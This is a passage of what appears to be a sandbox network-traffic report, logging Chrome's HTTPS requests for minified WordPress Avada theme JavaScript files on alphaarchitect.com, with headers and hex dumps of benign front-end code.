                                                                                                                                                                                                                                                                        Data Ascii: Query("[data-youtube-video-id="+e.target.getVideoData().video_id+"]").data("loop")&&e.target.seekTo(0)):e.data===YT.PlayerState.PLAYING&&jQuery(e.target.getIframe()).parent().css("opacity","1")}function resizeVideo(e){var t,i,o,a,d,n,r,s,u,f,v,c,m,l,p,y=e
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 6f 6e 74 61 69 6e 65 72 2d 76 69 64 65 6f 2d 62 67 22 29 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 72 74 6c 22 29 3f 79 2e 66 69 6e 64 28 70 29 2e 70 61 72 65 6e 74 28 29 2e 63 73 73 28 7b 6d 61 72 67 69 6e 52 69 67 68 74 3a 63 2c 6d 61 72 67 69 6e 4c 65 66 74 3a 6d 2c 6d 61 72 67 69 6e 54 6f 70 3a 76 7d 29 3a 79 2e 66 69 6e 64 28 70 29 2e 70 61 72 65 6e 74 28 29 2e 63 73 73 28 7b 6d 61 72 67 69 6e 52 69 67 68 74 3a 6d 2c 6d 61 72 67 69 6e 4c 65 66 74 3a 63 2c 6d 61 72 67 69 6e 54 6f 70 3a 76 7d 29 2c 79 2e 66 69 6e 64 28 70 29 2e 63 73 73 28 7b 77 69 64 74 68 3a 66 2c 68 65 69 67 68 74 3a 75 2c 22 7a 2d 69 6e 64 65 78 22 3a 2d 31 7d 29 29 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 73
                                                                                                                                                                                                                                                                        Data Ascii: ontainer-video-bg"),jQuery("body").hasClass("rtl")?y.find(p).parent().css({marginRight:c,marginLeft:m,marginTop:v}):y.find(p).parent().css({marginRight:m,marginLeft:c,marginTop:v}),y.find(p).css({width:f,height:u,"z-index":-1}))):setTimeout(function(){res
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC983INData Raw: 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 2c 20 5b 64 61 74 61 2d 76 69 6d 65 6f 2d 76 69 64 65 6f 2d 69 64 5d 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 65 28 74 68 69 73 29 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 73 69 7a 65 56 69 64 65 6f 28 74 29 7d 2c 31 30 30 29 7d 29 2c 65 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 2c 20 5b 64 61 74 61 2d 76 69 6d 65 6f 2d 76 69 64 65 6f 2d 69 64 5d 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 65 28 74 68 69 73 29 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 73 69 7a 65 56 69 64 65 6f 28 74 29 7d 2c 31 65 33 29 7d 29 2c 65 28 77 69 6e
                                                                                                                                                                                                                                                                        Data Ascii: data-youtube-video-id], [data-vimeo-video-id]").each(function(){var t=e(this);setTimeout(function(){resizeVideo(t)},100)}),e("[data-youtube-video-id], [data-vimeo-video-id]").each(function(){var t=e(this);setTimeout(function(){resizeVideo(t)},1e3)}),e(win
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        122192.168.2.449880141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC832OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-crossfade-images.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1a1"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba27c8504244-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC424INData Raw: 31 61 31 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 75 73 69 6f 6e 52 65 73 69 7a 65 43 72 6f 73 73 66 61 64 65 49 6d 61 67 65 73 43 6f 6e 74 61 69 6e 65 72 28 65 29 7b 76 61 72 20 69 3d 30 3b 65 2e 66 69 6e 64 28 22 69 6d 67 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 68 65 69 67 68 74 28 29 3b 65 3e 69 26 26 28 69 3d 65 29 7d 29 2c 65 2e 63 73 73 28 22 68 65 69 67 68 74 22 2c 69 29 7d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 72 65 73 69 7a 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 63 72 6f 73 73 66 61 64 65 2d 69 6d 61 67 65 73 22 29 2e 65 61
                                                                                                                                                                                                                                                                        Data Ascii: 1a1function fusionResizeCrossfadeImagesContainer(e){var i=0;e.find("img").each(function(){var e=jQuery(this).height();e>i&&(i=e)}),e.css("height",i)}jQuery(window).on("load",function(){jQuery(window).on("resize",function(){jQuery(".crossfade-images").ea
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        123192.168.2.449881141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC624OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-lightbox.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1c45"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba27dd898cab-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC877INData Raw: 31 63 34 35 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 76 61 64 61 4c 69 67 68 74 42 6f 78 49 6e 69 74 69 61 6c 69 7a 65 4c 69 67 68 74 62 6f 78 28 29 7b 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 26 26 6a 51 75 65 72 79 2e 65 61 63 68 28 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 5b 74 5d 2e 64 65 73 74 72 6f 79 28 29 7d 29 2c 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 2e 69 6e 69 74 69 61 6c 69 7a 65 5f 6c 69 67 68 74 62 6f 78 28 29 7d 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 3d 7b 7d 2c 76 6f 69 64 20 30 3d 3d 3d 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 26 26 28 77 69 6e 64 6f 77
                                                                                                                                                                                                                                                                        Data Ascii: 1c45function avadaLightBoxInitializeLightbox(){window.$ilInstances&&jQuery.each(window.$ilInstances,function(t,i){window.$ilInstances[t].destroy()}),window.avadaLightBox.initialize_lightbox()}window.avadaLightBox={},void 0===window.$ilInstances&&(window
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 65 6e 67 74 68 3b 74 2b 2b 29 72 2b 3d 53 74 72 69 6e 67 28 73 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 2e 22 2b 6e 5b 74 5d 29 3b 69 3d 2f 68 74 74 70 28 73 3f 29 3a 5c 2f 5c 2f 28 77 77 77 5c 2e 29 3f 76 69 6d 65 6f 2e 63 6f 6d 5c 2f 28 5c 64 2b 29 2f 2c 73 2e 6d 61 74 63 68 28 69 29 26 26 28 72 3d 31 29 2c 69 3d 2f 5e 2e 2a 28 28 79 6f 75 74 75 2e 62 65 5c 2f 29 7c 28 76 5c 2f 29 7c 28 5c 2f 75 5c 2f 5c 77 5c 2f 29 7c 28 65 6d 62 65 64 5c 2f 29 7c 28 77 61 74 63 68 5c 3f 29 29 5c 3f 3f 76 3f 3d 3f 28 5b 5e 23 5c 26 5c 3f 5d 2a 29 2e 2a 2f 2c 73 2e 6d 61 74 63 68 28 69 29 26 26 28 72 3d 31 29 2c 2d 31 2a 6e 2e 6c 65 6e 67 74 68 3d 3d 3d 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 26 26 28 6a 51 75 65 72 79 28 74 68 69 73
                                                                                                                                                                                                                                                                        Data Ascii: ength;t++)r+=String(s).toLowerCase().indexOf("."+n[t]);i=/http(s?):\/\/(www\.)?vimeo.com\/(\d+)/,s.match(i)&&(r=1),i=/^.*((youtu.be\/)|(v\/)|(\/u\/\w\/)|(embed\/)|(watch\?))\??v?=?([^#\&\?]*).*/,s.match(i)&&(r=1),-1*n.length===parseInt(r,10)&&(jQuery(this
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 22 5d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 68 72 65 66 22 29 3b 22 22 21 3d 3d 74 26 26 76 6f 69 64 20 30 21 3d 3d 74 26 26 28 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 5b 22 73 69 6e 67 6c 65 5f 22 2b 6f 5d 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 69 4c 69 67 68 74 42 6f 78 28 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 2e 70 72 65 70 61 72 65 5f 6f 70 74 69 6f 6e 73 28 22 73 69 6e 67 6c 65 22 29 29 2c 6f 2b 2b 29 7d 29 2c 74 2e 66 69 6e 64 28 22 23 6c 69 67 68 74 62 6f 78 2d 6c 69 6e 6b 2c 20 2e 6c 69 67 68 74 62 6f 78 2d 6c 69 6e 6b 2c 20 2e 66 75 73 69 6f 6e 2d 6c 69 67 68 74 62 6f 78 2d 6c 69 6e 6b 22 29 2e 65 61 63 68 28 66
                                                                                                                                                                                                                                                                        Data Ascii: "]').each(function(){var t=jQuery(this).attr("href");""!==t&&void 0!==t&&(window.$ilInstances["single_"+o]=jQuery(this).iLightBox(window.avadaLightBox.prepare_options("single")),o++)}),t.find("#lightbox-link, .lightbox-link, .fusion-lightbox-link").each(f
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 79 28 74 68 69 73 29 2e 68 61 73 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 6e 6f 2d 6c 69 67 68 74 62 6f 78 22 29 7c 7c 28 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 63 61 70 74 69 6f 6e 22 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 22 70 2e 77 70 2d 63 61 70 74 69 6f 6e 2d 74 65 78 74 22 29 2e 74 65 78 74 28 29 29 2c 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 5b 22 73 69 6e 67 6c 65 5f 22 2b 6f 5d 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 69 4c 69 67 68 74 42 6f 78 28 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 2e 70 72 65 70 61 72 65 5f 6f 70 74 69 6f 6e 73 28 22 70 6f 73 74 22 29 29 2c 6f 2b 2b 29 7d 29 7d 2c 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67
                                                                                                                                                                                                                                                                        Data Ascii: y(this).hasClass("fusion-no-lightbox")||(jQuery(this).attr("data-caption",jQuery(this).parent().find("p.wp-caption-text").text()),window.$ilInstances["single_"+o]=jQuery(this).iLightBox(window.avadaLightBox.prepare_options("post")),o++)})},window.avadaLig
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 69 67 68 74 62 6f 78 5f 74 69 74 6c 65 2c 73 70 65 65 64 3a 65 5b 66 75 73 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 69 67 68 74 62 6f 78 5f 61 6e 69 6d 61 74 69 6f 6e 5f 73 70 65 65 64 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7d 2c 70 61 74 68 3a 66 75 73 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 69 67 68 74 62 6f 78 5f 70 61 74 68 2c 63 6f 6e 74 72 6f 6c 73 3a 7b 73 6c 69 64 65 73 68 6f 77 3a 69 2c 61 72 72 6f 77 73 3a 66 75 73 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 69 67 68 74 62 6f 78 5f 61 72 72 6f 77 73 7d 2c 73 6c 69 64 65 73 68 6f 77 3a 7b 70 61 75 73 65 54 69 6d 65 3a 66 75 73 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 69 67 68 74 62 6f 78 5f 73 6c 69 64
                                                                                                                                                                                                                                                                        Data Ascii: ionLightboxVars.lightbox_title,speed:e[fusionLightboxVars.lightbox_animation_speed.toLowerCase()]},path:fusionLightboxVars.lightbox_path,controls:{slideshow:i,arrows:fusionLightboxVars.lightbox_arrows},slideshow:{pauseTime:fusionLightboxVars.lightbox_slid
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC892INData Raw: 6b 49 64 3d 74 29 2c 6f 2e 74 65 78 74 3d 77 69 6e 64 6f 77 2e 66 75 73 69 6f 6e 4c 69 67 68 74 62 6f 78 56 61 72 73 2e 6c 31 30 6e 2c 6f 7d 2c 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 2e 72 65 66 72 65 73 68 5f 6c 69 67 68 74 62 6f 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 2e 73 65 74 5f 74 69 74 6c 65 5f 61 6e 64 5f 63 61 70 74 69 6f 6e 28 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 69 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 72 65 66 72 65 73 68 22 29 26 26 69 2e 72 65 66 72 65 73 68 28 29 7d 29 7d 2c 6a 51 75 65 72 79 28 64 6f 63
                                                                                                                                                                                                                                                                        Data Ascii: kId=t),o.text=window.fusionLightboxVars.l10n,o},window.avadaLightBox.refresh_lightbox=function(){"use strict";window.avadaLightBox.set_title_and_caption(),jQuery.each(window.$ilInstances,function(t,i){i.hasOwnProperty("refresh")&&i.refresh()})},jQuery(doc
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        124192.168.2.449882141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC822OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-select.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-375"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba294d8441f2-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC878INData Raw: 33 37 35 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 61 6c 63 53 65 6c 65 63 74 41 72 72 6f 77 44 69 6d 65 6e 73 69 6f 6e 73 28 65 29 7b 76 61 72 20 6e 3d 22 2e 61 76 61 64 61 2d 73 65 6c 65 63 74 2d 70 61 72 65 6e 74 20 2e 73 65 6c 65 63 74 2d 61 72 72 6f 77 2c 20 2e 67 72 61 76 69 74 79 2d 73 65 6c 65 63 74 2d 70 61 72 65 6e 74 20 2e 73 65 6c 65 63 74 2d 61 72 72 6f 77 2c 20 2e 77 70 63 66 37 2d 73 65 6c 65 63 74 2d 70 61 72 65 6e 74 20 2e 73 65 6c 65 63 74 2d 61 72 72 6f 77 22 3b 28 76 6f 69 64 20 30 21 3d 3d 65 3f 6a 51 75 65 72 79 28 65 29 2e 66 69 6e 64 28 6e 29 3a 6a 51 75 65 72 79 28 6e 29 29 2e 66 69 6c 74 65 72 28 22 3a 76 69 73 69 62 6c 65 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 30 3c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 72 65 76
                                                                                                                                                                                                                                                                        Data Ascii: 375function calcSelectArrowDimensions(e){var n=".avada-select-parent .select-arrow, .gravity-select-parent .select-arrow, .wpcf7-select-parent .select-arrow";(void 0!==e?jQuery(e).find(n):jQuery(n)).filter(":visible").each(function(){0<jQuery(this).prev
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC14INData Raw: 65 6e 73 69 6f 6e 73 28 6e 29 7d 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: ensions(n)})
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        125192.168.2.449883141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC623OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-youtube.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-10c2"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba295e707ced-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC877INData Raw: 31 30 63 32 0d 0a 76 61 72 20 70 72 65 76 43 61 6c 6c 62 61 63 6b 3d 77 69 6e 64 6f 77 2e 6f 6e 59 6f 75 54 75 62 65 50 6c 61 79 65 72 41 50 49 52 65 61 64 79 2c 66 75 73 69 6f 6e 54 69 6d 65 6f 75 74 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 72 65 67 69 73 74 65 72 59 6f 75 74 75 62 65 50 6c 61 79 65 72 73 28 65 29 7b 21 30 3d 3d 3d 77 69 6e 64 6f 77 2e 79 74 5f 76 69 64 5f 65 78 69 73 74 73 26 26 28 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 3d 5b 5d 2c 6a 51 75 65 72 79 28 22 2e 74 66 73 2d 73 6c 69 64 65 72 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2c 61 3d 74 2e 66 69 6e 64 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 22 29 2e 66
